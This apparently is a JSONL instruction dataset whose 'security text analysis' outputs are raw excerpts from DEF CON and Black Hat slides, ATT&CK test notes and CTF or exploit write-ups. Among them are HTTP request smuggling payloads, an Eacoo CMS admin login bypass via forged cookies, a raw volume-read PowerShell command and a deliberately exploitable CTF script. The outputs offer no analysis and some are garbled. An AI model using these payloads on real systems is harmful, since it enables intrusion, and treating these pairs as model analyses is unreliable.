{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfile:///D|/Work%20Related/DEFCON/presentations/dc-17-presentations/defcon-17-cough-references.txt Confidence Game Theater References Puzzlers' Tribute edited by David Wolfe and Tom Rodgers (2002) containes a chapter by William Kalush called Sleight of Hand with Playing Cards prior to Scot's Discoverie. This chapter includes a description of the earliest known deception with playing cards, which is a relative of Three Card Monte. Rogues, Vagabonds & Sturdy Beggars edited by Arthur F. Kinney (1973) contains reprints of some sixteenth and seventeenth century pamphlets discussing crime and criminals. It includes A Notable Discovery of Cozenage by Robert Greene (1591), which describes Mumchance, and The Fraternity of Vagabonds by John Awdeley (1561), which describes an early version of The Lost Ring, similar to the Apple1 skit we performed. Gambling Scams by Darwin Ortiz (1984) has a chapter about Three Card Monte and a chapter devoted to Confidence Games, both of them very good. file:///D|/Work%20Related/DEFCON/presentations/dc-17-presentations/defcon-17-cough-references.txt9/8/2009 9:22:38 PM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1006-win-直接访问卷 ## 来自ATT&CK的描述 攻击者可以直接访问一个卷以绕过文件访问控制和文件系统监控Windows允许程序直接访问逻辑卷拥有直接访问权的程序可以通过分析文件系统的数据结构直接从驱动器中读写文件这种技术可以绕过Windows文件访问控制以及文件系统监控工具 诸如NinjaCopy这样的实用程序可以在PowerShell中执行这些操作 ## 测试案例 通过DOS命令PowerShell读取卷引导扇区 此测试使用PowerShell通过DOS命令并对卷的前几个字节执行直接访问读取成功时将显示卷的前11个字节的十六进制转储 对于NTFS卷它应符合以下顺序NTFS分区引导扇区 ``` 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` 攻击命令用powerhell运行! 需要提升权限如root或admin ``` $buffer = New-Object byte[] 11 $handle = New-Object IO.FileStream \"\\\\.\\#{volume}\", 'Open', 'Read', 'ReadWrite' $handle.Read($buffer, 0, $buffer.Length) $handle.Close() Format-Hex -InputObject $buffer ``` ## 检测日志 暂无经过本地复现Windows安全日志Powershell操作日志Sysmon日志未记录到此命令的执行情况 ## 测试复现 ### 测试1 Read volume boot sector via DOS device path (PowerShell) ``` PS C:\\Windows\\system32> $buffer = New-Object byte[] 11 PS C:\\Windows\\system32> $handle = New-Object IO.FileStream \"\\\\.\\C:\", 'Open', 'Read', 'ReadWrite' PS C:\\Windows\\system32> $handle.Read($buffer, 0, $buffer.Length) 11 PS C:\\Windows\\system32> $handle.Close() PS C:\\Windows\\system32> Format-Hex -InputObject $buffer 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëRNTFS PS C:\\Windows\\system32> ``` ## 日志留痕 暂无 ## 检测规则/思路 ### 建议 监控处理由进程打开的驱动器卷以确定它们何时可以直接访问逻辑驱动器 监控进程和命令行参数看是否有可能采取行动从逻辑驱动器复制文件并规避普通文件系统保护由于这种技术也可能通过PowerShell使用建议对PowerShell脚本进行额外的记录 ## 参考推荐 MITRE-ATT&CK-T1006 <https://attack.mitre.org/techniques/T1006> Atomic-red-team-T1006 <https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1006>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResponse Smuggling Pwning HTTP/1.1 Connections Agenda - HTTP Request Smuggling - Desynchronization Variants - Response Smuggling - Response Concatenation - Arbitrary Proxy Cache Poisoning/Deception - Response Scripting HTTP Request Smuggling HTTP Request Smuggling - Attack introduced in 2005 by Watchfire - Abuse discrepancies between Front-end and Back-end Server - Multiple message-length directives in one request GET /example HTTP/1.1 Host: www.vulnerable.com Content-Length: 32 Content-Length: 5 AAAAAGET /DeleteMyAccount HTTP/1.1 X: GET /myAccount HTTP/1.1 Host: www.vulnerable.com Cookie: sessionID=1234 HTTP Request Smuggling - Desync Variants - Techniques to force discrepancy between servers - Headers are hidden from HTTP parsers - Reborned in 2019 by James Kettle - Real methodology to Detect - Confirm - Explore - Exploit - Demonstration of real systems being exploited Bounties! Connection Desync - End-to-End vs Hop-by-Hop Headers - Connection: Connection_Option - Directives close, keep-alive, <custom> - Connection Headers deleted when forwarded GET /Hello HTTP/1.1 Host: www.vulnerable.com Connection: Content-Length Content-Length: 13 SMUGGLED_DATA Request Smuggling Exploitation - Bypass Front-End controls (not Authentication) - Hijack Requests (only if data is stored and retrieved...) - Upgrades existing vulnerabilities (XSS, Open-Redirect) - Web Cache Attacks (Cache-Control ignored) Response Smuggling HTTP Response Smuggling - Inject a complete message in the Response Queue - HTTP Desyn & HTTP Response Splitting - Proxy fails to match Requests with corresponding Responses GET /example HTTP/1.1 Host: www.vulnerable.com GET /hello HTTP/1.1 Host: www.vulnerable.com POST /LoginAction HTTP/1.1 Host: www.vulnerable.com . User=admin&pass=abc123 HTTP Response Smuggling HTTP Pipelining HTTP Pipeline Desync - Pipelining not Enforced - Send through free connections - If MaxConn reached: pipeline || wait - Responses not stored - Connection closed HTTP Pipeline Desync - Smug", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 101 THE PANEL SUPER N00B KART Welcome to Las Vegas Pace yourself THIS IS DEF CON DGAF Everyone was a n00b once. All of us are still n00bs at something. THIS IS THE DESERT Stay hydrated All Good Sit Down And Drink Grab A Glass of Water Call A Doctor THE COUNTDOWN Simple rules for surviving Def Con THE COUNTDOWN 3 Get at least three hours sleep each night THE COUNTDOWN 2 Eat at least two meals each day THE COUNTDOWN 1 Bathe at least one time each day Wash your hands, too Underbelly is Not Sexy A WORD ABOUT SHIRTS DEF CON CRUD Fist your friends Fist them often Seriously, wash your damn hands This is Dick Dont. Be. A. Dick. The Basics Hold the door. Keep your head up. Pay attention. Dont block the hallway. Dont stand at the base of the escalator. Dont Be an Asshat Dont ruin everyones time Dont Heckle If you dont agree, talk afterwards. See previous slide. Ask Permission Phones and Wireless Seriously? This is a hacker convention. Use your head. Pictures See previous slide. Expect to be in a picture or two. Ask nicely if you dont want to be in one. Not everything is free Just because you see it laying out, does not mean you can take it. Have a Plan Read the program. HACKER TRACKER! Talks fill up quickly. Consider purchasing the videos from TSOK.  Originally created by Whitney Champion (shortxstack)  Lot of good info about DC25  Available on the App Store and Google Play  You should have downloaded it before now Hacker Tracker App The Talks Villages Biohacking Villages Car Hacking Village Crypto & Privacy Village Hardware Hacking Village ICS Village IoT Village Lockpick Village Packet Hacking Village Recon Villages R00tz 303 Skytalks Social Engineer Village Tamper Evident Village Voting Machine Hacking Village Wireless Village Contests + Events Too many to list  here are some highlights.  T.D.F. X-Hour Film Contest.  Capture the Flag.  No Badge Hack this year.  Hack the contests - Hacker Convention, remember? Workshops + Demo LaBs Workshops are training opportuniti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python3 import os, tempfile, subprocess try: data = input(\">\").strip() if len(data) > 12: raise Exception(\"too large\") with tempfile.TemporaryDirectory() as dirname: name = os.path.join(dirname, \"user\") with open(name, \"w\") as f: f.write(data) os.chmod(name, 0o500) print(subprocess.check_output(name)) except Exception as e: print(\"FAIL:\", e) exit(1)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEacoo Fullchain Exploit分析 Bug1: 登录绕过 登录绕过主要是框架的设计存在一些问题,可以通过构造cookie触发该逻辑漏洞,然后设置成指定uid登 录.触发的逻辑是使用user profile接口 关键点在于is_login()的逻辑 // apps/user/controller/Personal.php public function profile() { if(!is_login()){ $this->error('未登录'); } if (IS_POST) { /* 省略代码 */ }else { // 获取账号信息 $user_info = get_user_info(is_login()); // 获取登录信息,主要关注 is_login()的逻辑 unset($user_info['password']); unset($user_info['auth_group']['max']); $this->assign('user_info',$user_info); return $this->fetch(); } } // apps/admin/logic/AdminUser.php public static function isLogin() { $user = session('admin_login_auth'); if (empty($user)) { // 从session中获取admin_login_auth,如果是未登录的账号, 此处必定为空,进入下面的逻辑 if (cookie('?admin_uid') && cookie('?admin_signin_token')) { // 从 cookie中获取对应的字段 $user = self::get(cookie('admin_uid')); if ($user) { // 从cookie中获取user字段 $signin_token = data_auth_sign($user->username.$user- >uid.$user->last_login_time); // 计算出一个签名 eacoo的管理员账号为admin,对应的uid为1.从此处判断登录的代码可知,要满足等于admin管理员的 token签名校验,就必须要满足: admin_signin_token=data_auth_sign('admin1' + last_login_time) .在这里就要两个要素需要解决: 1. data_auth_sign()的代码是怎么处理hash的 2. 怎么样获取last_login_time的值 关于data_auth_sign()的实现,代码如下,简单来说就是对传入的字符做了一次sha1运算 也就是说,传入的数据需要满足 admin_signin_token=sha1('admin1' + last_login_time) .对于指 定uid的last_login_time值,可以通过链接 /public/index.php/user/index/info/uid/1.html 来泄漏. 那么最终的利用构造如下: if (cookie('admin_signin_token') == $signin_token) { // 如 果这个签名等于cookie中admin_signin_token的话,那么就认为登录成功 // 自动登录 self::autoLogin($user, true); // 以传入来的uid为身份设置登 录状态 return $user->uid; } } }; return 0; } else{ return session('admin_activation_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0; } } // apps/functions/string.php /** * 数据签名认证 * @param array $data 被认证的数据 * @return string 签名 * @author 麦当苗儿 <zuojiazi@vip.qq.com> */ function data_auth_sign($data) { //数据类型检测 if (!is_array($data)) { $data = (array)$data; } ksort($data); //排序 $code = http_build_query($data); //url编码并生成query字符串 $sign = sha1($code); //生成签名 return $sign; } 至此就可以获得后台管理员权限了 Bug2:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlvdisplay === 显示逻辑卷属性 ## 补充说明 **lvdisplay命令** 用于显示LVM逻辑卷空间大小读写状态和快照信息等属性如果省略\"逻辑卷\"参数则lvdisplay命令显示所有的逻辑卷属性否则仅显示指定的逻辑卷属性 ### 语法 ```shell lvdisplay(参数) ``` ### 参数 逻辑卷指定要显示属性的逻辑卷对应的设备文件 ### 实例 使用lvdisplay命令显示指定逻辑卷的属性在命令行中输入下面的命令 ```shell [root@localhost ~]# lvdisplay /dev/vg1000/lvol0 #显示逻辑卷属性 ``` 输出信息如下 ```shell --- Logical volume --- LV Name /dev/vg1000/lvol0 ......省略部分输出内容...... Block device 253:0 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFIRMWARE SLAP: AUTOMATING DISCOVERY OF EXPLOITABLE VULNERABILITIES IN FIRMWARE CHRISTOPHER ROBERTS WHO AM I  Researcher at REDLattice Inc.  Interested in finding bugs in embedded systems  Interested in program analysis  CTF Player A QUICK BACKGROUND IN EXPLOITABLE BUGS DARPA CYBER GRAND CHALLENGE  Automated cyber reasoning systems:  Find vulnerabilities  Exploit vulnerabilities  Patch vulnerabilities  Automatically generates full exploits and proof of concepts. PREVENTING BUGS AUTOMATICALLY  Source level protections  LLVMs Clang static analyzers  Compile time protections  Non-executable stack  Stack canaries  RELRO  _FORTIFY_SOURCE  Operating system protections  ASLR PREVENTING BUGS AUTOMATICALLY  Source level protections  LLVMs Clang static analyzers - Maybe  Compile time protections  Non-executable stack - Maybe  Stack canaries  RELRO  _FORTIFY_SOURCE  Operating system protections  ASLR In Embedded Devices EXPLOIT MITIGATIONS  There has to be an exploit to mitigate it, right? Non-executable stack Stack Canaries RELRO _FORTIFY SOURCE ASLR ALMOND 3 DEMO  CVE-2019-13087  CVE-2019-13088  CVE-2019-13089  CVE-2019-13090  CVE-2019-13091  CVE-2019-13092 CONCOLIC ANALYSIS  Symbolic Analysis + Concrete Analysis  Lots of talks already on this subject.  Really good at find specific inputs to trigger code paths  For my work in Firmware Slap I used angr!  Concolic analysis  CFG analysis  Used in Cyber Grand Challenge for 3rd place! BUILDING REAL INPUTS FROM SYMBOLIC DATA  Source level protections  LLVMs Clang static analyzers  Compile time protections  Non-executable stack  Stack canaries  RELRO  _FORTIFY_SOURCE  Operating system protections  ASLR  Symbolic Variable Here  get_user_input()  To get our You did it output  angr will create several program states  One has the constraints:  x >= 200  x < 250  angr sends these constraints to its theorem prover to give:  X=231 or x=217 or x=249  Symbolically represent more of the program state.  Registers, Call Stack, Files  Query the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1027-003-win-Ping Hex IP ## 来自ATT&CK的描述 攻击者可能试图通过加密编码或其他方式混淆可执行文件或文件在系统中或传输中的内容从而使其难以发现或分析这是常见的行为可以跨不同的平台和网络使用用于逃避追踪 有效载荷可能被压缩存档或加密以避免被检测到这些有效载荷可以在初始访问期间或以后使用以减轻检测有时可能需要用户采取行动才能打开和反混淆/解码文件信息以供用户执行可能还要求用户输入密码以打开由攻击者提供的受密码保护的压缩/加密文件攻击者也可以使用压缩或存档脚本例如Javascript 还可以对文件的某些部分进行编码以隐藏纯文本字符串否则它们将有助于防御者发现有效载荷也可能被拆分为看似良性的单独文件这些文件仅在重新组合后才会显示恶意功能 攻击者还可能混淆从有效载荷执行的命令或直接通过命令行界面执行的命令环境变量别名字符和其他平台/语言特定的语义可用于规避基于签名的检测和白名单机制 ## 测试案例 攻击者使用十六进制编码的IP地址进行ping命令探测主机 ## 检测日志 windows 安全日志/sysmon日志 ## 测试复现 windows 2012以上操作系统 ![ping1](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/1.png) ## 测试留痕 ![ping2](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/ping2.png) ## 检测规则/思路 ### sigma规则 ```yml title: Ping Hex IP description: win7 模拟测试结果 references: - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_ping_hex_ip.yml status: experimental author: 12306Bro logsource:  product: windows  service: security detection: selection: CommandLine: - '*\\ping.exe 0x*' - '*\\ping 0x*' condition: selection level: high ``` ### 建议 暂无 ## 相关TIP [[T1027-004-win-传输后编译csc.exe(白名单)]] [[T1027-005-linux-主机上的监测组件删除]] [[T1027-005-win-SDelete删除文件]] ## 参考推荐 MITRE-ATT&CK-T1027-003 <https://attack.mitre.org/techniques/T1027/003/> IP地址进制转换 <https://tool.520101.com/wangluo/jinzhizhuanhuan/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents IAM Whoever I Say IAM Infiltrating Identity Providers Using 0Click Exploits Steven Seeley of 360 Vulnerability Research Institute #BHUSA @BlackHatEvents Information Classification: General > whoami Focusing on Web, Application & Cloud 0-day Research:  Security Researcher for 360 Vulnerability Research Institute  Teaching the \"Full Stack Web Attack\" class Speaker and/or trainer at:  Black Hat / BlueHat / HiTB / BSides Selected highlights:  Discovered over 1500+ vulnerabilities with a high/critical impact  Pwn2Own contestant in 2022, 2021 and team winner in 2020 #BHUSA @BlackHatEvents Information Classification: General Agenda Introduction  What is Identity and Access Management (IAM)?  Authentication vs Authorization Past Attacks Against IAM Solutions  Oracle Access Manager (CVE-2021-35587)  ForgeRock OpenAM (CVE-2021-35464)  VMware Workspace ONE Access (CVE-2020-4006) Target Selection & Vulnerability Discovery  Discovering CVE-2022-22954  Discovering a full chain RCE known as Hekate Conclusions #BHUSA @BlackHatEvents Information Classification: General What is IAM? The integration of Identity and Access Management into a single solution. Identity (Authentication) The validation that I am who I say I am. Typically this is done with password authentication and federated authentication such as Single Sign On (SSO) technology  Security Assertion Markup Language (SAML) Access (Authorization) The verification of privileges or permissions to a given resource from an already authenticated user.  Open Authorization (OAuth2)  Java Web Token (JWT) for data exchange #BHUSA @BlackHatEvents Information Classification: General What is IAM? Its a prime target to attackers! 1. Full control of authentication and authorization 2. Must be externally exposed on the perimeter 3. Must use complicated technology stacks and protocols Breaching an IAM on a perimeter means breaching several other systems controlled by the organization! #BHUSA @BlackHatEvents Information", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPacking & the Friendly Skies Deviant Ollam Packing & the Friendly Skies Why Transporting Firearms May Be The Best Way To Safeguard Your Tech When You Fly Deviant Ollam Packing & the Friendly Skies Deviant Ollam you may have seen me before Packing & the Friendly Skies Deviant Ollam i speak at lots of cons Packing & the Friendly Skies Deviant Ollam many of which i cant drive to Packing & the Friendly Skies Deviant Ollam my bags used to get opened a lot Packing & the Friendly Skies Deviant Ollam  and not always by the TSA Packing & the Friendly Skies Deviant Ollam nowadays i lock all my gear Packing & the Friendly Skies Deviant Ollam notice these are not TSA locks Packing & the Friendly Skies Deviant Ollam but proper heavy-duty padlocks Packing & the Friendly Skies Deviant Ollam how is this allowed Packing & the Friendly Skies Deviant Ollam simple, really Packing & the Friendly Skies Deviant Ollam now, i fly with firearms all the time Packing & the Friendly Skies Deviant Ollam flying with firearms  its easier than you think  its relatively hassle-free  it results in major security Packing & the Friendly Skies Deviant Ollam facts and the law  federal standards (mostly uniform, specifics can vary by airline but no one can abridge your rights)  checked bag only, unloaded (do i really have to tell you that?)  non-TSA lock (no one else gets the key or combo)  declared upon check-in Packing & the Friendly Skies Deviant Ollam specifics about packing  hard case, size can vary (ill assume youll use larger luggage to leverage the law to your advantage)  ammo policies can vary a lot by airline (how its packed, how much you can carry, same luggage or separately)  bags may not be opened once secured (unless you are present)  no outside indicator labels of any kind (27 CFR 478.31 - Delivery by Common or Contract Carrier, 18 USC Section 922e) Packing & the Friendly Skies Deviant Ollam how the procedure works and what to expect Packing & the Friendly Skies Deviant Ollam Packing & the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nxrandr === X 窗口系统配置管理工具 ## 补充说明 **xrandr命令**RandRRotate and Resize旋转与缩放是一个X窗口系统扩展允许客户端动态调整即缩放旋转翻转屏幕xrandr是一款官方的randr扩展配置工具 ### 语法 ```shell xrandr(选项)(参数) ``` ### 选项 ```shell --auto #以系统最大分辨率输出 --off #指定设备设置为关闭 --output #输出设备 --mode #设置分辨率 --rate #设置刷新率 --right-of #主显示器右侧 --left-of #主显示器左侧 --above #主显示器上方 --below #主显示器下方 ``` ### 参数 * 显示设备编号 ### 实例 测试配置列出可用设备及其信息 ```shell xrandr Screen 0: minimum 320 x 200, current 3200 x 1080, maximum 8192 x 8192 VGA-1 disconnected (normal left inverted right x axis y axis) HDMI-1 connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 531mm x 299mm 1920x1080 59.93 + 60.00* 50.00 59.94 1920x1080i 60.00 50.00 59.94 1680x1050 59.88  ``` 克隆屏幕 ```shell xrandr --output HDMI-1 --auto ``` 多显示器关闭不需要的 ```shell xrandr --output HDMI-1 --off --output HDMI-2 --auto ``` 指定分辨率和刷新率 ```shell xrandr --output HDMI-1 --mode 1920x1080 --rate 60 ``` VGA1位于HDMI1左侧均使用最佳分辨率分屏显示 ```shell xrandr --output VGA1 --auto --output HDMI1 --auto --right-of VGA1 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# b4s1[4l (Misc 150) ``` Dive into this, it's a terrorist transmission, they can't know too much about encoding &|| cryptography. It was sent hundreds of times to all their supporters. We really think it s actually the same message. https://dctf.def.camp/b4s1.php Hint1: \"What is normal in the challenge title?\" Hint 2: strrev(strtoupper($title)) ``` ###ENG [PL](#pl-version) In the task we have access to webpage with 6 lines of 16 byte strings: ``` fw[TqCTfDCoXnEpO HsQdDnInc}_tVeG FyIG`ebzDcE\\sM{X fIivqEmcJo_snC\\b TaYNwORnfgoFdRRc RukE\\zEEPegOVu@h ``` Each time you refresh the page the strings change. Even before the hints were posted we did bitwise analysis of the data on the page and it seemed that in our sample of a few hundred strings there was a regularity: the least significant bit of each byte was constant. So we extracted those bits and tried to decode this in every way possible (by column, by row, inverted, as 6,7,8 bit bytes, xored etc.), failing. But after admins spoke to some teams about the task, they figured that they made a mistake... After the task was `fixed` it turned out that the solution was as simple as treating each 8 bits as a ascii byte, and translating the message to `leastnotlast`. ###PL version W zadaniu dostajemy dostęp do strony internetowej na której wyświetlane jest 6 linii tekstu po 16 bajtów w linii: ``` fw[TqCTfDCoXnEpO HsQdDnInc}_tVeG FyIG`ebzDcE\\sM{X fIivqEmcJo_snC\\b TaYNwORnfgoFdRRc RukE\\zEEPegOVu@h ``` Za każdym refreshem stringi na stronie są inne. Jeszcze zanim pojawiły się hinty przeprowadziliśmy analizę bitów stringów na stronie, na próbce kilkuset różnych zestawów, i widać było regularność: niski bit każdego bajtu był stały. Wyciągnęliśmy powtarzające się bity i próbowaliśmy dekodować je na wszystkie sposoby (po kolumnie, po wierszu, odwrócone, jako 6,7,8 bitowe bajty, xorowane itd), ale bez efektów. Jakiś czas później admini przeprowadzili wywiad wśród kilku drużyn i zrozumieli że pomylili się w zadaniu... Po tym jak zadanie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlog HTTP请求走私 2020-07-22  Web漏洞 聊HTTP请求走私之前需要先思考一个问题HTTP请求如何标识一个请求的结束尤其是POST请求 一种是通过 Content-Length 请求头 的值界定请求体的长度另一种是在分块传输时通过 Transfer- Encoding: chunked 请求头与请求体最后一行的 0\\r\\n\\r\\n 来标识该请求的结束不计入请求体长度 按照HTTP/1.1规范标准这两种请求头同时存在时应该忽略 Content-Length 而以分块传输为准但是对于 反代链中的多个服务器而言可能有些并不支持分块传输请求头有些对于标准规范的实现并未足够精细 在处理一些畸形请求头时会有非预期的效果 HTTP请求走私漏洞正是由于前后端服务器界定标准不一致导致的利用HTTP请求走私使得 一次攻击 在前端 服务器识别为 一个请求 但传送到后端服务器时其误认为这是用了pipelining而将其识别为 两个不同的请求  更深入的细节原理涉及到反代和后端对于消息的处理机制这部分现在还不懂以后懂了再单独分析 CL-TE 0. 前端读取 CL 值为50会将这一整段视为一个请求转发至后端 0 及之后的部分会被认作是该请求的 请求体内容 首页 分类 标签 为了方便表述接下来均将用于反向代理的服务器称为前端隐藏在反代服务器之后用于提供具体业 务的服务器称为后端用 CL-TE 表示前端以 Content-Length 作为请求结束界定标准 TE-CL 表示 前端以 Transfer-Encoding 作为请求结束界定标准 1 2 3 4 5 6 7 8 9 10 11 12 POST /search HTTP/1.1 Host: xxx.net ... Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked q=something 0 GET /404 HTTP/1.1 X-Ignore: eat HTTP  1. 后端接收时以 TE 作为界定标准将 0\\r\\n\\r\\n 视为一个请求的结束将后续部分视作下一个传输过 来的请求 2. 由于我们构造的后面这个请求的包结构并不完整所以后端认为这份数据还没有接收完毕会继续将随 后到来的请求拼接进去 3. 注意 CL 取值为50时是截止到最后一行的最后一个字母 t 的也就是说 t 后面并不存在 \\r\\n 这 对回车换行符那么后端随后紧接而来的请求实际上会被拼接成这种样子 这就导致了后续对 /search 的访问因为请求行被吃进了 X-Ignore 这个请求头的值中拼接后实际变成 了对 /404 的访问 从理论上来说我们可以发出请求走私攻击包后紧接着发送一个正常请求根据后者不正常的响应差异来 判断漏洞存在 在实战中我们的攻击请求和紧接着发送的正常请求之间很可能会有其他人的某个请求刚好插在了中间这 样我们本来期待用于判断漏洞的不正常响应就会被回复给别人影响别人正常使用的同时还会导致我们误以 为没洞所以最好避开高峰期多试几次 或者基于响应时间来判断 TE-CL 1 2 3 4 5 6 7 8 GET /404 HTTP/1.1 X-Ignore: eatPOST /search HTTP/1.1 Host: xxx.net ... Content-Type: application/x-www-form-urlencoded Content-Length: 11 q=something Code 1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /search HTTP/1.1 Host: xxx.net ... Content-Type: application/x-www-form-urlencoded Content-length: 13 Transfer-Encoding: chunked q=something POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 HTTP  0. 前端以 TE 作为界定标准会将这一整段视为一个请求转发至后端 q=something 及之后的部分会被 认作是该请求的请求体内容 1. 前端读取 CL 值为13认为第一个请求截止到 q=something 将后续部分视作下一个传输过来的请求 2. 由于我们构造的后面这个请求的 CL 值为15所以后端认为这份数据还没有接收完毕会继续在随后 到来的请求中取出5个字符拼接进去 3. 后端随后紧接而来的请求实际上会被拼接成", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack%to%Basics%%x86%Windows%Based%Buffer%Overflows,%an%introduc:on%to%buffer%overflows% Instructor%-%Dino%Covotsos% Telspace%Systems% CoInstructor%%Manuel%Corregedor% @telspacesystems% Whoami'(x2)'?' We%work%in%the%Penetra:on%Tes:ng%space%(Telspace%Systems)% % Approximately%20%years%in% % Trying%to%keep%some%sort%of%work/life%balance!%;)% % Various%qualifica:ons,%degrees%etc% Agenda' -%Introduc:on%to%the%workshop(We%are%here!).% -%The%Stack%and%Registers.% -%Basic%x86%ASM.% -%Basic%exploita:on%techniques.% -%Fuzzing.% -%Introduc:on%to%variety%of%Skeleton%Python%scripts(copy% paste%buffer%overflows,%remote%buffer%overflows%etc).% Agenda' -%Vanilla%EIP%overwrites%in%Immunity%Debugger.% -%Overwri:ng%EIP,%Jumping%to%ESP,%execu:ng%Shellcode% (generated%by%Metasploit%or%compiled%from%exploit-db/ shellstorm).% -%Bad%characters%and%how%to%deal%with%them.% -%Prac:cal%example.% Agenda' -%Introduc:on%to%SEH%exploita:on%techniques.% -%Introduc:on%to%Mona,%basic%asm%jumps%and%shell%coding.% -%Prac:cal%examples.% Agenda' -%What%are%egg%hunters?%% -%Example%of%a%egg%hunter%being%u:lised%in%a%SEH%exploit.% -%Ques:ons%and%Answers.%% -%References.% The%Stack%and%Registers(x86)% The%8%32%bit%General%Purpose%Registers:% % Accumulator%register%(AX).%Used%in%arithme:c%opera:ons% Counter%register%(CX).%Used%in%shid/rotate%instruc:ons%and%loops.% Data%register%(DX).%Used%in%arithme:c%opera:ons%and%I/O%opera:ons.% Base%register%(BX).%Used%as%a%pointer%to%data%(located%in%segment%register%DS,%when%in% segmented%mode).% Stack%Pointer%register%(SP).%Pointer%to%the%top%of%the%stack.% Stack%Base%Pointer%register%(BP).%Used%to%point%to%the%base%of%the%stack.% Source%Index%register%(SI).%Used%as%a%pointer%to%a%source%in%stream%opera:ons.% Des:na:on%Index%register%(DI).%Used%as%a%pointer%to%a%des:na:on%in%stream%opera:ons.% The%Stack%and%Registers(x86)% REF:%hep://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html% Basic%x86%ASM% X86%ASM%(for%this%workshop):% % add/sub% xor% mov% push% pop% call% jmp%(and%condi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBosses love Excel  hackers too! Juan Garrido Silverhack Chema Alonso (@chemaalonso) INFORMATICA64.COM Who? About  Security Researchers  Working at INFORMATICA64  http://www.informatica64.com What? Terminal Applications Why? RDP Citrix Using Bing Secure? Verbosity  Conf -files are too verbosity Internal IP Address Users & encrypted passwords Internal Software Perfect for APTs  0-day exploits  Evilgrade attacks Verbosity Verbosity  Attacker can: modify conf files Generate error messages Fingerprinting all software  Example: C.A.C.A. Computer Assited Citrix Apps Hash Stealing  Modify the Conf file  Run a remote app in a rogue Server  Sniff the hash Playing the Piano Playing the Piano  Too many links Specially running on Windows 2008  Too many environment variables %SystemRoot% %ProgramFiles% %SystemDrive% Playing the Piano  Too many shortcuts  Ctrl + h  Web History  Ctrl + n  New Web Browser  Shift + Left Click  New Web Browser  Ctrl + o  Internet Addres  Ctrl + p  Print  Right Click (Shift + F10)  Save Image As  View Source  F1  Jump to URL Playing the Piano  Too , Too , Too many shorcuts: ALT GR+SUPR = CTRL + ALT + SUP CTRL + F1 = CTRL + ALT + SUP CTRL + F3 = TASK MANAGER  Sticky Keys Easy? Paths? Minimun Exposure Paths  There are as many paths as pulbished apps  Every app is a path that could drive to elevate privileges  Complex tools are better candidates  Excel is a complex tool Excel as a Path  Office Apps are complex  Too many security policies Necesary to donwload extra GPOS  Too many systems by default No Security GPOs Allowing non-signed Macros Allowing third-part-signed macros Allowing CA to be added Excel 1 Software Restriction Policies  Forbidden apps Via hash Via path  App Locker Using Digital Certificates  ACLs Software Restriction Policies  Too many consoles Cmd.exe Windows Management Instrumentation PowerShell  Even consoles from other OS ReactOS Excel 2 Risky? Start the III World War  Find a bug in a DHS Computer  Getting to the OS  Sing an excel file", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSubver'ng the World of Warcra4 API by Christopher Mooney James Luedke NDA If you are a Blizzard employee or a Blizzard fanboy this NDA applies to you. You are forbidden to discuss this code with anyone else upon penalty of tar and feather. In fact we have tested this presenta'on out on other Blizzard employees/fanboys and their faces melted off. We would strongly suggest that if you iden'fy with either of these groups you leave the room now. Whats more, this code is so provoca've that to verify it works you will need to violate your own companies terms of service, which could have the unfortunate sideeffect of imploding the universe. Remember, we are professionals and its never a good idea to cross the streams. Who Are We? Christopher Mooney > Project DoD Inc. > University of Southern Maine > Cryptology and Computer Security > Gearman > C So4ware Engineer > High Performance/Availability Space > BTP Code > Day Jobs James Luedke > Project DoD Inc. > Gearman > Drizzle > C So4ware Engineer > High Volume Messaging > High Performance/Availability Space > BTP Code > Day Jobs > We will run a live demo, > explain how the UI used to work, > explain how it works now, > briefly discuss protected func'on, > talk about sidechannel aYacks, > 